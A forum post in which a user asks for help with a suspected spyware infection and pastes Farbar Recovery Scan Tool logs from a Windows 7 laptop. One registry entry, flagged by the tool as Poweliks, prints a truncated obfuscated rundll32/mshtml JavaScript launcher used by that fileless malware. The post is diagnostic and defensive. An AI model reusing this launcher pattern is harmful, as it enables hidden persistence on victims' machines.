dllhost file on syswow64 spyware - FRST done

[chazzini]

This seems to be a popular spyware issue.  I've followed the instructions and ran the FRST program.  Results below.  Help is very much appreciated!!

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 29-10-2014 01
Ran by Charles (administrator) on CHARLES-THINK on 29-10-2014 12:57:12
Running from C:\Users\Charles\Desktop
Loaded Profile: Charles (Available profiles: Charles)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
() C:\Windows\System32\DTS.exe
(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(AuthenTec, Inc.) C:\Windows\System32\AtService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcPrfMgrSvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\CamMute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe
(Viewpoint Corporation) C:\Program Files (x86)\Viewpoint\Common\ViewpointService.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\ToolbarUpdater.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcSvc.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\loggingserver.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPOSDSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ZOOM\TpScrex.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPONSCR.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
(Lenovo.) C:\Windows\System32\TpShocks.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Client Security Solution\cssauth.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Viewpoint Corporation) C:\Program Files (x86)\Viewpoint\Viewpoint Manager\ViewMgr.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\SvcGuiHlpr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Client Security Solution\password_manager.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
() C:\Program Files (x86)\AVG Web TuneUp\vprot.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Client Security Solution\password_manager.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\btwdins.exe
(Dropbox, Inc.) C:\Users\Charles\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE
(InterVideo) C:\Program Files (x86)\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Intel Corporation) C:\Program Files (x86)\Intel\AMT\LMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Lenovo Group Limited) C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Intel Corporation) C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(AVG Secure Search) C:\Program Files (x86)\AVG Web TuneUp\avgcefrend.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [picon] => C:\Program Files (x86)\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe [358424 2009-08-03] (Intel Corporation)
HKLM\...\Run: [TpShocks] => C:\Windows\system32\TpShocks.exe [380704 2009-07-08] (Lenovo.)
HKLM\...\Run: [FingerPrintSoftware] => C:\Program Files\Lenovo Fingerprint Software\fpapp.exe [1582328 2009-09-01] (AuthenTec)
HKLM\...\Run: [AcWin7Hlpr] => C:\Program Files (x86)\Lenovo\Access Connections\AcTBenabler.exe [63832 2014-03-14] (Lenovo)
HKLM\...\Run: [cssauth] => C:\Program Files\Lenovo\Client Security Solution\cssauth.exe [5990200 2011-06-10] (Lenovo Group Limited)
HKLM\...\Run: [LenVolFx] => C:\Windows\LenVolEx64.exe [15208 2009-11-02] (Lenovo)
HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [60920 2013-05-29] (Lenovo Group Limited)
HKLM\...\Run: [smartAudio] => C:\Program Files\CONEXANT\SAII\SAIICpl.exe [307768 2009-11-19] ()
HKLM-x32\...\Run: [PWMTRV] => rundll32 "C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.DLL",PwrMgrBkGndMonitor
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [WheelMouse] => C:\Advanced Wheel Mouse\wh_exec.exe [86016 2007-03-11] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-06] (Apple Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840592 2014-09-04] (Adobe Systems Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41360 2014-09-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [450560 2013-08-21] (DivX, LLC)
HKLM-x32\...\Run: [DivXUpdate] => C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1861968 2013-08-28] ()
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3649040 2014-10-16] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG Web TuneUp\vprot.exe [3037208 2014-10-29] ()
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\Run: [Adobe Acrobat Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\AdobeCollabSync.exe [1104288 2014-09-04] (Adobe Systems Incorporated)
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\Run: [ROC_ROC_APR2013_AV] => C:\Users\Charles\AppData\Roaming\AVG April 2013 Campaign\AVG-Secure-Search-Update.exe /PROMPT --mid 1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d --CMPID ROC_APR2013_AV
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\Run: [AVG-Secure-Search-Update_0913a] => C:\Users\Charles\AppData\Roaming\AVG 0913a Campaign\AVG-Secure-Search-Update-0913a.exe /PROMPT --mid 1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d --CMPID 0913a
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\MountPoints2: {f397cc25-9f37-11e0-9bf5-00226819c704} - D:\LaunchU3.exe
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Lsa: [Notification Packages] scecli ACGina
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Charles\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\Charles\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://lenovo.msn.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://www.lenovo.com/welcome/thinkpad
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - DefaultScope {7ABD5EFD-88A6-E9CE-80AE-DBCA8C52F41C} URL = http://www.bing.com/search?q={searchTerms}&pc=Z134&form=ZGAIDF&install_date=20110828&iesrc={referrer:source}
SearchScopes: HKCU - VWPT URL = http://search.viewpoint.com/pl/search?tab=1&k={searchTerms}&addr=1&query=vb=1%26tn%3D0%26addr%3D1%26type%3Drel39%5fvista%26instid%3DViewpointV39%5fvista
SearchScopes: HKCU - {7ABD5EFD-88A6-E9CE-80AE-DBCA8C52F41C} URL = http://www.bing.com/search?q={searchTerms}&pc=Z134&form=ZGAIDF&install_date=20110828&iesrc={referrer:source}
SearchScopes: HKCU - {95B7759C-8C7F-4BF1-B163-73684A933233} URL = https://mysearch.avg.com/search?cid={CF064197-EF34-483D-9875-B1E2E5BC5836}&mid=1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d〈=en&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-10-29 11:52:56&v=4.0.0.17&pid=wtu&sg=&sap=dsp&q={searchTerms}
SearchScopes: HKCU - {D552A914-C4D7-44A7-89F3-51389FAACF75} URL =
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll No File
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: AVG Web TuneUp -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> C:\Program Files (x86)\AVG Web TuneUp\4.0.0.17\AVG Web TuneUp.dll (AVG)
BHO-x32: Viewpoint Toolbar BHO -> {A7327C09-B521-4EDB-8509-7D2660C9EC98} -> C:\Program Files (x86)\Viewpoint\Viewpoint Toolbar\3.9.0\ViewBarBHO.dll (Viewpoint Corporation)
BHO-x32: CrossRider -> {A876E312-7D08-401a-B7A6-FAFC5DC2F292} -> C:\Program Files (x86)\CrossriderWebApps\Crossrider.dll ()
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: IePasswordManagerHelper Class -> {BF468356-BB7E-42D7-9F15-4F3B9BCFCED2} -> C:\Program Files (x86)\Lenovo\Client Security Solution\tvtpwm_ie_com.dll (Lenovo Group Limited)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Viewpoint Toolbar - {F8AD5AA5-D966-4667-9DAF-2561D68B2012} - C:\Program Files (x86)\Common Files\Viewpoint\Toolbar Runtime\3.9.0\IEViewBar.dll (Viewpoint Corporation)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {2DAD3559-2923-4935-AD49-B673D2539944} http://www-307.ibm.com/pc/support/acpir.cab
DPF: HKLM-x32 {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: HKLM-x32 {9E472D58-F10C-11CF-B7A9-0020AFD6A362} https://vault.netvoyage.com/neWeb2/neWebCl.cab
DPF: HKLM-x32 {9E472D6A-F10C-11CF-B7A9-0020AFD6A362} https://vault.netvoyage.com/neWeb2/neCrypto.cab
DPF: HKLM-x32 {CC679CB8-DC4B-458B-B817-D447B3B6AC31} https://vpn01.bcm.edu/CACHE/stc/1/binaries/vpnweb.cab
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.10\ViProtocol.dll (AVG Secure Search)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default
FF DefaultSearchEngine: AVG Secure Search
FF SelectedSearchEngine: AVG Secure Search
FF Homepage: https://mysearch.avg.com?cid={CF064197-EF34-483D-9875-B1E2E5BC5836}&mid=1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d〈=en&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-10-29 11:52:56&v=4.0.0.17&pid=wtu&sg=&sap=hp
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.10\\npsitesafety.dll No File
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll (DivX, LLC)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF SearchPlugin: C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default\searchplugins\avg-secure-search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\wtu-secure-search.xml
FF Extension: AVG Web TuneUp - C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default\Extensions\avg@toolbar [2014-10-29]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2012-03-16]
FF HKCU\...\Firefox\Extensions: [{F74D5734-46F5-4B16-96F0-1E7FBF41B750}] - C:\Program Files (x86)\Lenovo\Client Security Solution\PWM Firefox Extension\2.0b12
FF Extension: ThinkVantage Password Manager - C:\Program Files (x86)\Lenovo\Client Security Solution\PWM Firefox Extension\2.0b12 [2013-11-21]

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [jpnbdefcbnoefmmcpelplabbkfmfhlho] - C:\ProgramData\CodecCheck\chrome\codec_check.crx [2011-08-28]

 

 

ADDITION.TXT

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-10-2014 01
Ran by Charles at 2014-10-29 12:50:13
Running from C:\Users\Charles\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 Registry Patch to arrange icons in Device and Printers folder of Windows 7 (HKLM\...\W7DevOR) (Version: 1.00 - )
2007 Microsoft Office system (HKLM-x32\...\PROHYBRIDR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Access Help (HKLM-x32\...\{C6FA39A7-26B1-480A-BC74-6D17531AC222}) (Version: 3.00 - Lenovo)
Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.1.12 - Adobe Systems)
Adobe Flash Player 10 Plugin (HKLM-x32\...\{0DFB3DE8-65B9-44FF-AA0A-3BECC5A2BFD1}) (Version: 10.0.32.18 - Adobe Systems, Inc.)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.02) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.02 - Adobe Systems Incorporated)
Advanced Wheel Mouse 6.0.0.001 (HKLM-x32\...\WheelMouse) (Version:  - )
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Audio / Video Codec Pack (HKLM-x32\...\{B21C0FF0-AECF-47F7-9036-A1A32B10A168}) (Version: 2.0.015 - )
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5557 - AVG Technologies)
AVG 2015 (Version: 15.0.4189 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5557 - AVG Technologies) Hidden
AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.0.0.17 - AVG Technologies)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Business Contact Manager for Outlook 2007 SP2 (HKLM-x32\...\Business Contact Manager) (Version: 3.0.8619.1 - Microsoft Corporation)
Business Contact Manager for Outlook 2007 SP2 (x32 Version: 3.0.8619.1 - Microsoft Corporation) Hidden
Client Security - Password Manager (HKLM\...\{3FD730D4-755F-439B-8082-B55E00924A44}) (Version: 8.30.0049.00 - Lenovo Group Limited)
Conexant 20561 SmartAudio HD (HKLM\...\CNXT_AUDIO_HDA) (Version: 4.92.12.0 - Conexant)
Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)
Crossrider Web Apps (HKLM-x32\...\Crossrider) (Version:  - ) <==== ATTENTION
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Diablo II (HKLM-x32\...\Diablo II) (Version:  - Blizzard Entertainment)
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
DivX Setup (HKLM-x32\...\DivX Setup) (Version: 2.6.1.100 - DivX, LLC)
Dropbox (HKCU\...\Dropbox) (Version: 2.10.30 - Dropbox, Inc.)
E-Transcript Bundle Viewer (HKLM-x32\...\{72AE5ECD-0CAF-4017-BC86-E2908014C09C}) (Version: 5.0.2.132 - Thomson Reuters)
FileZilla Client 3.7.2 (HKLM-x32\...\FileZilla Client) (Version: 3.7.2 - Tim Kosse)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Hanword HWP document converter for Microsoft Word (x64) (HKLM\...\{90150000-2009-0409-1000-0000000FF1CE}) (Version: 15.0.4454.1506 - Microsoft Corporation)
HP Officejet Pro 8500 A910 Basic Device Software (HKLM\...\{33A06AC3-F20D-417A-B621-83A73771624E}) (Version: 22.0.334.0 - Hewlett-Packard Co.)
HP Officejet Pro 8500 A910 Help (HKLM-x32\...\{13D324E9-9DB1-478D-944C-28BBE1BB80DC}) (Version: 140.0.2.2 - Hewlett Packard)
HP Officejet Pro 8500 A910 Product Improvement Study (HKLM\...\{963EF6DD-DE6B-43D8-A2AC-9217FD39958F}) (Version: 22.0.334.0 - Hewlett-Packard Co.)
HP Update (HKLM-x32\...\{787D1A33-A97B-4245-87C0-7174609A540C}) (Version: 5.002.005.003 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4 - HP)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - Intel Corporation)
Intel® Management Engine Interface (HKLM\...\HECI) (Version:  - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version:  - )
Intel® PROSet/Wireless WiFi Software (HKLM\...\{CCAFF072-4DDB-4846-963D-15F02A8E9472}) (Version: 13.00.0000 - Intel Corporation)
Intel® Active Management Technology (HKLM\...\MESOL) (Version:  - Intel Corporation)
